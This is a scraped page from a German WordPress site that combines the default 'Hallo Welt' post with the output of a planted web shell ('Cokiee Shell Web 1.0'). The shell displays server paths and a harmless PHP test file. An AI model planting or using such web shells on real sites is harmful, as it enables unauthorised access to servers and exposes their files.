Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /usr/local/src/php7/php-7.0.5/Zend/tests/ |
Current File : //usr/local/src/php7/php-7.0.5/Zend/tests/bug34893.phpt |
--TEST-- Bug #34893 (PHP5.1 overloading, Cannot access private property) --FILE-- <?php class A { private $p; function __get($name){ return $this->$name; } function __set($name, $value) { $this->$name = $value; } } class B { private $t; function __get($name){ return $this->$name; } function __set($name, $value) { $this->$name = $value; } } $a = new A; $b = new B; $a->p = $b; $b->t = "foo"; echo $a->p->t; $a->p->t = "bar"; echo $a->p->t; ?> --EXPECT-- foobar
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare